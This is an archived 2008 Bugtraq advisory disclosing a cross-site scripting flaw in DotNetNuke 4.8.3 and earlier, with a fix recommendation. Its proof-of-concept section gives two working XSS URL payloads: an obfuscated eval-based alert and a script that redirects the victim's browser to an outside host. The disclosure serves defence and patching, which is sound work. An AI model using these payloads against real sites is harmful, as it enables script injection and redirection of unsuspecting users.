Home page logo
/

bugtraq logo Bugtraq mailing list archives

Dot Net Nuke (DNN) <= 4.8.3 XSS Vulnerability
From: Admin () bugreport ir
Date: 30 May 2008 11:20:46 -0000

########################## www.BugReport.ir #######################################
#
#               AmnPardaz Security Research Team
#
# Title: Dot Net Nuke (DNN) XSS Vulnerability.
# Vendor: www.dotnetnuke.com
# Vulnerable Version: 4.8.3 and prior versions
# Exploit: N/A
# Impact: Low
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/38
###################################################################################

####################
1. Description:
####################
        DotNetNuke is an open source web application framework ideal for creating, deploying and managing interactive 
web, intranet and extranet sites.

####################
2. Vulnerability:
####################
        XSS in "Default.aspx", by using "/" after the ".aspx" file. We must use another ".aspx" string, before "?" or 
at end of the URL.
        In fact, "PATH_INFO" in ServerVariables can manipulate by an attacker by entering "/" after the ".aspx" files. 
So, using "URL" is better than "PATH_INFO".
        
####################
3. PoC:
####################
        - Alert by XSS
                http://[DNN URL]/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From 
WWW.BugReport.IR/)';eval(x);alert().aspx
        
        - Redirect by XSS (We must use a "?" because of using ":" in "HTTP://")
                http://[DNN URL]/Default.aspx/bugreport/"onmouseover="var 
a='.aspx?';document.location='http://www.bugreport.ir/?archive&apos;;

####################
4. Solution:
####################
        Check the vendor hotfix and use URLScan (http://www.microsoft.com/technet/security/tools/urlscan.mspx).
        
####################
5. Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com


  By Date           By Thread  

Current thread:
  • Dot Net Nuke (DNN) <= 4.8.3 XSS Vulnerability Admin (May 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]